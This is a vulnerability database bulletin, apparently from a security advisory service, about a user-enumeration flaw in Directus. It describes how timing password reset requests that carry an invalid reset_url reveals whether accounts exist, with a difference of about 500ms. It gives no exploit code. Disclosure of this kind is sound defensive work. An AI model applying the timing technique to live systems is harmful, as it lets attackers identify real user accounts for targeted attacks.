Main Vulnerability Database SB20260423137

SB20260423137 - Observable discrepancy in Directus

Published: April 23, 2026

Security Bulletin ID SB20260423137

CSH Severity

Medium

Patch available

YES

Number of vulnerabilities 1

Exploitation vector Remote access

Highest impact Information disclosure

Breakdown by Severity

Low
Medium
High
Critical

Description

This security bulletin contains information about 1 vulnerability.

1) Observable discrepancy (CVE-ID: CVE-2026-26185)

CWE-ID: CWE-203 - Observable discrepancy

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Green

The vulnerability allows a remote attacker to disclose sensitive information about the existence of user accounts.

The vulnerability exists due to an observable discrepancy in the password reset endpoint when handling password reset requests with an invalid reset_url parameter. A remote attacker can send crafted password reset requests and measure response times to disclose sensitive information about the existence of user accounts.

The response time differs by approximately 500ms between existing and non-existing users.

Remediation

Install update from vendor's website.

References

https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf